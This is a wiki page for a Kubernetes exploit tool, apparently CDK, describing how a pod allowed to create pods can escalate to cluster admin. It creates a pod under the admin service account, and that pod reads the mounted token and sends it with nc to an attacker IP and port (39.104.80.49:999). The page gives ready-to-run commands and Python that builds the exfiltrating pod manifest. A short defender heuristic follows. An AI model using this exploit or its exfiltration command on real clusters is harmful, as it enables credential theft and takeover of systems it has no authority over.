Exploit: k8s get sa token
cdxy edited this page Mar 17, 2021 · 1 revision
Bypass K8s RBAC with the "create pod" privilege. If the current pod's service account is allowed to create pods, this exploit can be used to escalate to cluster admin: it creates a pod that runs under the target (e.g. admin) service account, so that service account's token is mounted into the new pod; the pod then reads the token and sends it to the attacker's public server at the given IP:port. The target service account must exist in the namespace where the pod is created, and the created pod is a visible artifact (it shows up in pod listings and in the API server's audit log).
cdk run k8s-get-sa-token (default|anonymous|<service-account-token-path>) <target-service-account> <ip> <port>
Request Options:
default: connect to the API server with the pod's default service account token
anonymous: connect to the API server as the user system:anonymous
<service-account-token-path>: connect to the API server with a user-specified service account token
Exploit Options:
target-service-account: name of the service account whose token is to be dumped (e.g. admin); the pod is created with this serviceAccountName.
ip: attacker-controlled IP address to which the token is sent.
port: port on that IP where the attacker's listener is waiting.
First, listen on a port on a public server to receive the data
(on the attacker's public server, e.g. 39.104.80.49)
nc -lvp 999
Inside the victim pod, which has the "create pod" privilege, run the CDK exploit to dump the "admin" service account's token:
(in the victim pod)
./cdk run k8s-get-sa-token default admin 39.104.80.49 999
The token arrives on the listener and can then be used as a bearer token against the API server with the target service account's permissions.
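The following Python is an added example, not CDK's own code, showing the three pieces behind the procedure above: the SelfSubjectAccessReview body you would POST first to confirm the "create pod" precondition, the shape of the pod the exploit creates (assumed here: an alpine image reading the mounted token with cat and shipping it with busybox nc; CDK's real manifest may differ), and a defender-side heuristic over a pod manifest that flags this shape. All names (`token_dump_pod`, `can_create_pods_review`, `looks_like_sa_token_pivot`) are hypothetical.

```python
import json

# Standard in-pod location of the mounted service account token (a Kubernetes fact).
SA_TOKEN_PATH = "/var/run/secrets/kubernetes.io/serviceaccount/token"


def can_create_pods_review(namespace):
    """Body of a SelfSubjectAccessReview asking whether the caller may create pods.

    POST it to /apis/authorization.k8s.io/v1/selfsubjectaccessreviews with the
    current token; status.allowed in the reply is the exploit's precondition.
    """
    return {
        "apiVersion": "authorization.k8s.io/v1",
        "kind": "SelfSubjectAccessReview",
        "spec": {
            "resourceAttributes": {
                "namespace": namespace,
                "verb": "create",
                "resource": "pods",
            }
        },
    }


def token_dump_pod(namespace, target_sa, ip, port, image="alpine:3.18", name=None):
    """Pod manifest that runs as target_sa and ships its mounted token to ip:port.

    Assumed shape (hypothetical, not CDK's manifest): target_sa must exist in
    `namespace`; the container reads the token and sends it with busybox nc.
    """
    port = int(port)
    if not 1 <= port <= 65535:
        raise ValueError("port out of range")
    name = name or f"sa-dump-{target_sa}"
    cmd = f"cat {SA_TOKEN_PATH} | nc {ip} {port}"
    return {
        "apiVersion": "v1",
        "kind": "Pod",
        "metadata": {"name": name, "namespace": namespace},
        "spec": {
            "serviceAccountName": target_sa,        # this is the privilege pivot
            "automountServiceAccountToken": True,   # the default; stated explicitly
            "restartPolicy": "Never",               # one-shot, no restart loop
            "containers": [
                {"name": "dump", "image": image, "command": ["sh", "-c", cmd]}
            ],
        },
    }


def looks_like_sa_token_pivot(manifest):
    """Defender heuristic (e.g. in an admission webhook or over an audit event's
    requestObject): a non-default serviceAccountName combined with a container
    command that touches the token path is the shape of this exploit.
    """
    spec = manifest.get("spec", {})
    if spec.get("serviceAccountName", "default") == "default":
        return False
    for container in spec.get("containers", []):
        blob = " ".join(container.get("command", []) + container.get("args", []))
        if SA_TOKEN_PATH in blob:
            return True
    return False


if __name__ == "__main__":
    # Same parameters as the page's example invocation (constructed sample input).
    pod = token_dump_pod("default", "admin", "39.104.80.49", 999)
    print(json.dumps(can_create_pods_review("default"), indent=2))
    print(json.dumps(pod, indent=2))
    print("flagged:", looks_like_sa_token_pivot(pod))
```

The heuristic is deliberately narrow: a workload that legitimately runs under a custom service account and never names the token path in its command line is not flagged, while the exploit's pod, which must both select the target account and read the mounted file, is.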